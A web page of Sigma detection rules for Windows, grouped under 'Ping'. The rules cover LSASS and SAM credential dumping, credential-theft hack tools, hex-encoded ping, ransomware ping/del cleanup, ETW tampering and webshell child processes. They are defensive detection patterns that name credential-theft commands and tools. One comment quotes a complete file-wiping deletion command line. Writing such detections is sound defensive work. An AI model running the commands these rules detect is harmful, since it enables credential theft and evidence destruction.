Sigma rules for Ping
61 rules · scoped to tool · back to Ping
Direct rules mention this entity in their title or description. Related rules cover the techniques this entity is known to use.
title: HackTool - Credential Dumping Tools Named Pipe Created
id: 961d0ba2-3eea-4303-a930-2cf78bbfcc5e
status: test
description: Detects well-known credential dumping tools execution via specific named pipe creation
references:
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
- https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799
author: Teymur Kheirkhabarov, oscd.community
date: 2019-11-01
modified: 2023-08-07
tags:
- attack.credential-access
- attack.t1003.001
- attack.t1003.002
- attack.t1003.004
- attack.t1003.005
logsource:
product: windows
category: pipe_created
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
selection:
PipeName|contains:
- '\cachedump'
- '\lsadump'
- '\wceservicepipe'
condition: selection
falsepositives:
- Legitimate Administrator using tool for password recovery
level: critical
title: Potential Credential Dumping Via LSASS Process Clone
id: c8da0dfd-4ed0-4b68-962d-13c9c884384e
status: test
description: Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity
references:
- https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/
- https://twitter.com/Hexacorn/status/1420053502554951689
- https://twitter.com/SBousseaden/status/1464566846594691073?s=20
author: Florian Roth (Nextron Systems), Samir Bousseaden
date: 2021-11-27
modified: 2023-03-02
tags:
- attack.credential-access
- attack.t1003
- attack.t1003.001
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\Windows\System32\lsass.exe'
Image|endswith: '\Windows\System32\lsass.exe'
condition: selection
falsepositives:
- Unknown
level: critical
title: HackTool - Windows Credential Editor (WCE) Execution
id: 7aa7009a-28b9-4344-8c1f-159489a390df
status: test
description: |
Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory.
It is often used by threat actors for credential dumping and lateral movement within compromised networks.
references:
- https://www.ampliasecurity.com/research/windows-credentials-editor/
author: Florian Roth (Nextron Systems)
date: 2019-12-31
modified: 2025-10-21
tags:
- attack.credential-access
- attack.t1003.001
- attack.s0005
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith:
- '\WCE.exe'
- '\WCE64.exe'
selection_hash:
Hashes|contains:
- 'IMPHASH=136F0A8572C058A96436C82E541E4C41'
- 'IMPHASH=589657C64DDE88533186C39F82FA1F50'
- 'IMPHASH=6BFE09EFCB4FFDE061EBDBAFC4DB84CF'
- 'IMPHASH=7D490037BF450877E6D0287BDCFF8D2E'
- 'IMPHASH=8AB93B061287C79F3088C5BC7E7D97ED'
- 'IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F'
- 'IMPHASH=BA434A7A729EEC20E136CA4C32D6C740'
- 'IMPHASH=BD1D1547DA13C0FCB6C15E86217D5EB8'
- 'IMPHASH=E96A73C7BF33A464C510EDE582318BF2'
condition: 1 of selection_*
falsepositives:
- Unknown
level: critical
title: Potential Credential Dumping Via LSASS SilentProcessExit Technique
id: 55e29995-75e7-451a-bef0-6225e2f13597
related:
- id: 36803969-5421-41ec-b92f-8500f79c23b0
type: similar
status: test
description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
references:
- https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
- https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
author: Florian Roth (Nextron Systems)
date: 2021-02-26
modified: 2022-12-19
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains: 'Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe'
condition: selection
falsepositives:
- Unlikely
level: critical
title: Possible Impacket SecretDump Remote Activity - Zeek
id: 92dae1ed-1c9d-4eff-a567-33acbd95b00e
status: test
description: 'Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml'
references:
- https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html
author: 'Samir Bousseaden, @neu5ron'
date: 2020-03-19
modified: 2021-11-27
tags:
- attack.credential-access
- attack.t1003.002
- attack.t1003.004
- attack.t1003.003
logsource:
product: zeek
service: smb_files
detection:
selection:
path|contains|all:
- '\'
- 'ADMIN$'
name|contains: 'SYSTEM32\'
name|endswith: '.tmp'
condition: selection
falsepositives:
- Unknown
level: high
title: Veeam Backup Servers Credential Dumping Script Execution
id: 976d6e6f-a04b-4900-9713-0134a353e38b
status: test
description: Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" class, in order to dump stored credentials.
references:
- https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/
- https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-04
tags:
- attack.credential-access
logsource:
product: windows
category: ps_script
definition: bade5735-5ab0-4aa7-a642-a11be0e40872
detection:
selection:
ScriptBlockText|contains|all:
- '[Credentials]'
- '[Veeam.Backup.Common.ProtectedStorage]::GetLocalString'
- 'Invoke-Sqlcmd'
- 'Veeam Backup and Replication'
condition: selection
falsepositives:
- Administrators backup scripts (must be investigated)
level: high
title: DSInternals Suspicious PowerShell Cmdlets - ScriptBlock
id: 846c7a87-8e14-4569-9d49-ecfd4276a01c
related:
- id: 43d91656-a9b2-4541-b7e2-6a9bd3a13f4e
type: similar
status: test
description: |
Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
references:
- https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-06-26
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains:
- 'Add-ADDBSidHistory'
- 'Add-ADNgcKey'
- 'Add-ADReplNgcKey'
- 'ConvertFrom-ADManagedPasswordBlob'
- 'ConvertFrom-GPPrefPassword'
- 'ConvertFrom-ManagedPasswordBlob'
- 'ConvertFrom-UnattendXmlPassword'
- 'ConvertFrom-UnicodePassword'
- 'ConvertTo-AADHash'
- 'ConvertTo-GPPrefPassword'
- 'ConvertTo-KerberosKey'
- 'ConvertTo-LMHash'
- 'ConvertTo-MsoPasswordHash'
- 'ConvertTo-NTHash'
- 'ConvertTo-OrgIdHash'
- 'ConvertTo-UnicodePassword'
- 'Disable-ADDBAccount'
- 'Enable-ADDBAccount'
- 'Get-ADDBAccount'
- 'Get-ADDBBackupKey'
- 'Get-ADDBDomainController'
- 'Get-ADDBGroupManagedServiceAccount'
- 'Get-ADDBKdsRootKey'
- 'Get-ADDBSchemaAttribute'
- 'Get-ADDBServiceAccount'
- 'Get-ADDefaultPasswordPolicy'
- 'Get-ADKeyCredential' # Covers 'Get-ADKeyCredentialLink'
- 'Get-ADPasswordPolicy'
- 'Get-ADReplAccount'
- 'Get-ADReplBackupKey'
- 'Get-ADReplicationAccount'
- 'Get-ADSIAccount'
- 'Get-AzureADUserEx'
- 'Get-BootKey'
- 'Get-KeyCredential'
- 'Get-LsaBackupKey'
- 'Get-LsaPolicy' # Covers 'Get-LsaPolicyInformation'
- 'Get-SamPasswordPolicy'
- 'Get-SysKey'
- 'Get-SystemKey'
- 'New-ADDBRestoreFromMediaScript'
- 'New-ADKeyCredential' # Covers 'New-ADKeyCredentialLink'
- 'New-ADNgcKey'
- 'New-NTHashSet'
- 'Remove-ADDBObject'
- 'Save-DPAPIBlob'
- 'Set-ADAccountPasswordHash'
- 'Set-ADDBAccountPassword' # Covers 'Set-ADDBAccountPasswordHash'
- 'Set-ADDBBootKey'
- 'Set-ADDBDomainController'
- 'Set-ADDBPrimaryGroup'
- 'Set-ADDBSysKey'
- 'Set-AzureADUserEx'
- 'Set-LsaPolicy' # Covers 'Set-LSAPolicyInformation'
- 'Set-SamAccountPasswordHash'
- 'Set-WinUserPasswordHash'
- 'Test-ADDBPasswordQuality'
- 'Test-ADPasswordQuality'
- 'Test-ADReplPasswordQuality'
- 'Test-PasswordQuality'
- 'Unlock-ADDBAccount'
- 'Write-ADNgcKey'
- 'Write-ADReplNgcKey'
condition: selection
falsepositives:
- Legitimate usage of DSInternals for administration or audit purpose.
level: high
title: HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
id: 6e2a900a-ced9-4e4a-a9c2-13e706f9518a
status: test
description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
references:
- https://github.com/Porchetta-Industries/CrackMapExec
- https://github.com/fortra/impacket/blob/ff8c200fd040b04d3b5ff05449646737f836235d/examples/secretsdump.py
author: SecurityAura
date: 2022-11-16
modified: 2024-06-27
tags:
- attack.credential-access
- attack.t1003
logsource:
product: windows
category: file_event
detection:
selection:
Image|endswith: '\svchost.exe'
# CommandLine|contains: 'RemoteRegistry' # Uncomment this line if you collect CommandLine data for files events from more accuracy
TargetFilename|re: '\\Windows\\System32\\[a-zA-Z0-9]{8}\.tmp$'
condition: selection
falsepositives:
- Unknown
level: high
title: LSASS Process Memory Dump Creation Via Taskmgr.EXE
id: 69ca12af-119d-44ed-b50f-a47af0ebc364
status: test
description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
author: Swachchhanda Shrawan Poudel
date: 2023-10-19
references:
- https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1003.001/T1003.001.md#L1
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: file_event
product: windows
detection:
selection:
Image|endswith:
- ':\Windows\system32\taskmgr.exe'
- ':\Windows\SysWOW64\taskmgr.exe'
TargetFilename|contains|all:
- '\AppData\Local\Temp\'
- '\lsass'
- '.DMP'
condition: selection
falsepositives:
- Rare case of troubleshooting by an administrator or support that has to be investigated regardless
level: high
regression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml
title: LSASS Process Dump Artefact In CrashDumps Folder
id: 6902955a-01b7-432c-b32a-6f5f81d8f625
status: test
description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
references:
- https://github.com/deepinstinct/Lsass-Shtinkering
- https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
author: '@pbssubhash'
date: 2022-12-08
tags:
- attack.credential-access
- attack.t1003.001
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|startswith: 'C:\Windows\System32\config\systemprofile\AppData\Local\CrashDumps\'
TargetFilename|contains: 'lsass.exe.'
TargetFilename|endswith: '.dmp'
condition: selection
falsepositives:
- Rare legitimate dump of the process by the operating system due to a crash of lsass
level: high
title: LSASS Process Memory Dump Files
id: a5a2d357-1ab8-4675-a967-ef9990a59391
related:
- id: db2110f3-479d-42a6-94fb-d35bc1e46492
type: obsolete
- id: 5e3d3601-0662-4af0-b1d2-36a05e90c40a
type: obsolete
status: test
description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
references:
- https://www.google.com/search?q=procdump+lsass
- https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf
- https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml
- https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/
- https://github.com/helpsystems/nanodump
- https://github.com/CCob/MirrorDump
- https://github.com/safedv/RustiveDump/blob/1a9b026b477587becfb62df9677cede619d42030/src/main.rs#L35
- https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258
author: Florian Roth (Nextron Systems)
date: 2021-11-15
modified: 2024-10-08
tags:
- attack.credential-access
- attack.t1003.001
logsource:
product: windows
category: file_event
detection:
selection_1:
TargetFilename|endswith:
- '\Andrew.dmp'
- '\Coredump.dmp'
- '\lsass.dmp'
- '\lsass.rar'
- '\lsass.zip'
- '\NotLSASS.zip' # https://github.com/CCob/MirrorDump
- '\PPLBlade.dmp' # https://github.com/tastypepperoni/PPLBlade
- '\rustive.dmp' # https://github.com/safedv/RustiveDump/blob/main/src/main.rs#L35
selection_2:
TargetFilename|contains:
- '\lsass_2' # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp
- '\lsassdmp'
- '\lsassdump'
selection_3:
TargetFilename|contains|all:
- '\lsass'
- '.dmp'
selection_4:
TargetFilename|contains: 'SQLDmpr'
TargetFilename|endswith: '.mdmp'
selection_5:
TargetFilename|contains:
- '\nanodump'
- '\proc_' # NativeDump pattern https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258
TargetFilename|endswith: '.dmp'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
title: Potential Credential Dumping Attempt Via PowerShell Remote Thread
id: fb656378-f909-47c1-8747-278bf09f4f4f
related:
- id: 3f07b9d1-2082-4c56-9277-613a621983cc
type: obsolete
- id: 0f920ebe-7aea-4c54-b202-9aa0c609cfe5
type: similar
status: test
description: Detects remote thread creation by PowerShell processes into "lsass.exe"
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
author: oscd.community, Natalia Shornikova
date: 2020-10-06
modified: 2022-12-18
tags:
- attack.credential-access
- attack.t1003.001
logsource:
product: windows
category: create_remote_thread
detection:
selection:
SourceImage|endswith:
- '\powershell.exe'
- '\pwsh.exe'
TargetImage|endswith: '\lsass.exe'
condition: selection
falsepositives:
- Unknown
level: high
title: Remote Thread Created In KeePass.EXE
id: 77564cc2-7382-438b-a7f6-395c2ae53b9a
status: test
description: Detects remote thread creation in "KeePass.exe" which could indicates potential password dumping activity
references:
- https://www.cisa.gov/uscert/ncas/alerts/aa20-259a
- https://github.com/denandz/KeeFarce
- https://github.com/GhostPack/KeeThief
author: Timon Hackenjos
date: 2022-04-22
modified: 2023-05-05
tags:
- attack.credential-access
- attack.t1555.005
logsource:
product: windows
category: create_remote_thread
detection:
selection:
TargetImage|endswith: '\KeePass.exe'
condition: selection
falsepositives:
- Unknown
level: high
title: Ping Hex IP
id: 1a0d4aba-7668-4365-9ce4-6d79ab088dfd
status: test
description: Detects a ping command that uses a hex encoded IP address
references:
- https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna
- https://twitter.com/vysecurity/status/977198418354491392
author: Florian Roth (Nextron Systems)
date: 2018-03-23
modified: 2025-10-17
tags:
- attack.stealth
- attack.t1140
- attack.t1027
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\ping.exe'
CommandLine|re: '0x[a-fA-F0-9]{8}'
condition: selection
falsepositives:
- Unlikely, because no sane admin pings IP addresses in a hexadecimal form
level: high
title: Dumping of Sensitive Hives Via Reg.EXE
id: fd877b94-9bb5-4191-bb25-d79cbd93c167
related:
- id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e
type: obsolete
- id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0
type: obsolete
status: test
description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
references:
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
- https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md
- https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets
author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
date: 2019-10-22
modified: 2023-12-13
tags:
- attack.credential-access
- attack.t1003.002
- attack.t1003.004
- attack.t1003.005
- car.2013-07-001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\reg.exe'
- OriginalFileName: 'reg.exe'
selection_cli_flag:
CommandLine|contains:
- ' save '
- ' export '
- ' ˢave '
- ' eˣport '
selection_cli_hklm:
CommandLine|contains:
- 'hklm'
- 'hk˪m'
- 'hkey_local_machine'
- 'hkey_˪ocal_machine'
- 'hkey_loca˪_machine'
- 'hkey_˪oca˪_machine'
selection_cli_hive:
CommandLine|contains:
- '\system'
- '\sam'
- '\security'
- '\ˢystem'
- '\syˢtem'
- '\ˢyˢtem'
- '\ˢam'
- '\ˢecurity'
condition: all of selection_*
falsepositives:
- Dumping hives for legitimate purpouse i.e. backup or forensic investigation
level: high
title: HackTool - Pypykatz Credentials Dumping Activity
id: a29808fd-ef50-49ff-9c7a-59a9b040b404
status: test
description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored
references:
- https://github.com/skelsec/pypykatz
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz
author: frack113
date: 2022-01-05
modified: 2023-02-05
tags:
- attack.credential-access
- attack.t1003.002
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- \pypykatz.exe
- \python.exe
CommandLine|contains|all:
- 'live'
- 'registry'
condition: selection
falsepositives:
- Unknown
level: high
title: HackTool - XORDump Execution
id: 66e563f9-1cbd-4a22-a957-d8b7c0f44372
status: test
description: Detects suspicious use of XORDump process memory dumping utility
references:
- https://github.com/audibleblink/xordump
author: Florian Roth (Nextron Systems)
date: 2022-01-28
modified: 2023-02-08
tags:
- attack.stealth
- attack.t1036
- attack.t1003.001
- attack.credential-access
logsource:
category: process_creation
product: windows
detection:
selection:
- Image|endswith: '\xordump.exe'
- CommandLine|contains:
- ' -process lsass.exe '
- ' -m comsvcs '
- ' -m dbghelp '
- ' -m dbgcore '
condition: selection
falsepositives:
- Another tool that uses the command line switches of XORdump
level: high
title: Potential Credential Dumping Attempt Using New NetworkProvider - CLI
id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77
related:
- id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701
type: similar
status: test
description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
references:
- https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade
- https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-23
modified: 2023-02-02
tags:
- attack.credential-access
- attack.t1003
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- '\System\CurrentControlSet\Services\'
- '\NetworkProvider'
# filter:
# CommandLine|contains:
# - '\System\CurrentControlSet\Services\WebClient\NetworkProvider'
# - '\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider'
# - '\System\CurrentControlSet\Services\RDPNP\NetworkProvider'
# - '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV
condition: selection
falsepositives:
- Other legitimate network providers used and not filtred in this rule
level: high
title: Potential Credential Dumping Via WER
id: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3
status: test
description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass
references:
- https://github.com/deepinstinct/Lsass-Shtinkering
- https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
author: '@pbssubhash , Nasreddine Bencherchali'
date: 2022-12-08
modified: 2022-12-09
tags:
- attack.credential-access
- attack.t1003.001
logsource:
product: windows
category: process_creation
detection:
selection_img:
- Image|endswith: '\Werfault.exe'
- OriginalFileName: 'WerFault.exe'
selection_cli:
ParentUser|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
User|contains:
- 'AUTHORI'
- 'AUTORI'
CommandLine|contains|all:
# Doc: WerFault.exe -u -p <target process> -ip <source process> -s <file mapping handle>
# Example: C:\Windows\system32\Werfault.exe -u -p 744 -ip 1112 -s 244
# If the source process is not equal to the target process and the target process is LSASS then this is an indication of this technique
# Example: If the "-p" points the PID of "lsass.exe" and "-ip" points to a different process than "lsass.exe" then this is a sign of malicious activity
- ' -u -p '
- ' -ip '
- ' -s '
filter_lsass:
ParentImage: 'C:\Windows\System32\lsass.exe'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine.
level: high
title: Suspicious Ping/Del Command Combination
id: 54786ddc-5b8a-11ed-9b6a-0242ac120002
status: test
description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example
references:
- https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf
- https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware
author: Ilya Krestinichev
date: 2022-11-03
modified: 2024-03-05
tags:
- attack.stealth
- attack.t1070.004
logsource:
category: process_creation
product: windows
detection:
# Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277
# Example: "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\User\Desktop\lockbit\lockbit.exe" & Del /f /q "C:\Users\User\Desktop\lockbit\lockbit.exe".
selection_count:
CommandLine|contains|windash: ' -n '
selection_nul:
CommandLine|contains: 'Nul' # Covers "> Nul" and ">Nul "
selection_del_param:
CommandLine|contains|windash:
- ' -f '
- ' -q '
selection_all:
CommandLine|contains|all:
- 'ping' # Covers "ping" and "ping.exe"
- 'del '
condition: all of selection_*
falsepositives:
- Unknown
level: high
title: Renamed PingCastle Binary Execution
id: 2433a154-bb3d-42e4-86c3-a26bdac91c45
status: test
description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
references:
- https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
- https://www.pingcastle.com/documentation/scanner/
author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
date: 2024-01-11
tags:
- attack.execution
- attack.stealth
- attack.t1059
- attack.t1202
logsource:
category: process_creation
product: windows
detection:
selection:
- OriginalFileName:
- 'PingCastleReporting.exe'
- 'PingCastleCloud.exe'
- 'PingCastle.exe'
- CommandLine|contains:
- '--scanner aclcheck'
- '--scanner antivirus'
- '--scanner computerversion'
- '--scanner foreignusers'
- '--scanner laps_bitlocker'
- '--scanner localadmin'
- '--scanner nullsession'
- '--scanner nullsession-trust'
- '--scanner oxidbindings'
- '--scanner remote'
- '--scanner share'
- '--scanner smb'
- '--scanner smb3querynetwork'
- '--scanner spooler'
- '--scanner startup'
- '--scanner zerologon'
- CommandLine|contains: '--no-enum-limit'
- CommandLine|contains|all:
- '--healthcheck'
- '--level Full'
- CommandLine|contains|all:
- '--healthcheck'
- '--server '
filter_main_img:
Image|endswith:
- '\PingCastleReporting.exe'
- '\PingCastleCloud.exe'
- '\PingCastle.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
title: ETW Logging Tamper In .NET Processes Via CommandLine
id: 41421f44-58f9-455d-838a-c398859841d4
status: test
description: |
Detects changes to environment variables related to ETW logging via the CommandLine.
This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
references:
- https://twitter.com/_xpn_/status/1268712093928378368
- https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr
- https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables
- https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38
- https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39
- https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_
- https://bunnyinside.com/?term=f71e8cb9c76a
- http://managed670.rssing.com/chan-5590147/all_p1.html
- https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code
- https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-05-02
modified: 2022-12-09
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'COMPlus_ETWEnabled'
- 'COMPlus_ETWFlags'
condition: selection
falsepositives:
- Unlikely
level: high
title: Webshell Hacking Activity Patterns
id: 4ebc877f-4612-45cb-b3a5-8e3834db36c9
status: test
description: |
Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
references:
- https://youtu.be/7aemGhaE9ds?t=641
author: Florian Roth (Nextron Systems)
date: 2022-03-17
modified: 2023-11-09
tags:
- attack.persistence
- attack.discovery
- attack.t1505.003
- attack.t1018
- attack.t1033
- attack.t1087
logsource:
category: process_creation
product: windows
detection:
# Webserver
selection_webserver_image:
ParentImage|endswith:
- '\caddy.exe'
- '\httpd.exe'
- '\nginx.exe'
- '\php-cgi.exe'
- '\w3wp.exe'
- '\ws_tomcatservice.exe'
selection_webserver_characteristics_tomcat1:
ParentImage|endswith:
- '\java.exe'
- '\javaw.exe'
ParentImage|contains:
- '-tomcat-'
- '\tomcat'
selection_webserver_characteristics_tomcat2:
ParentImage|endswith:
- '\java.exe'
- '\javaw.exe'
CommandLine|contains:
- 'catalina.jar'
- 'CATALINA_HOME'
# Suspicious child processes
selection_child_1:
# Process dumping
CommandLine|contains|all:
- 'rundll32'
- 'comsvcs'
selection_child_2:
# Winrar exfil
CommandLine|contains|all:
- ' -hp'
- ' a '
- ' -m'
selection_child_3:
# User add
CommandLine|contains|all:
- 'net'
- ' user '
- ' /add'
selection_child_4:
CommandLine|contains|all:
- 'net'
- ' localgroup '
- ' administrators '
- '/add'
selection_child_5:
Image|endswith:
# Credential stealing
- '\ntdsutil.exe'
# AD recon
- '\ldifde.exe'
- '\adfind.exe'
# Process dumping
- '\procdump.exe'
- '\Nanodump.exe'
# Destruction / ransom groups
- '\vssadmin.exe'
- '\fsutil.exe'
selection_child_6:
# SUspicious patterns
CommandLine|contains:
- ' -decode ' # Used with certutil
- ' -NoP ' # Often used in malicious PowerShell commands
- ' -W Hidden ' # Often used in malicious PowerShell commands
- ' /decode ' # Used with certutil
- ' /ticket:' # Rubeus
- ' sekurlsa' # Mimikatz
- '.dmp full' # Process dumping method apart from procdump
- '.downloadfile(' # PowerShell download command
- '.downloadstring(' # PowerShell download command
- 'FromBase64String' # PowerShell encoded payload
- 'process call create' # WMIC process creation
- 'reg save ' # save registry SAM - syskey extraction
- 'whoami /priv'
condition: 1 of selection_webserver_* and 1 of selection_child_*
falsepositives:
- Unlikely
level: high
title: PUA - PingCastle Execution From Potentially Suspicious Parent
id: b37998de-a70b-4f33-b219-ec36bf433dc0
related:
- id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c
type: derived
status: test
description: |
Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.
references:
- https://github.com/vletoux/pingcastle
- https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
- https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450
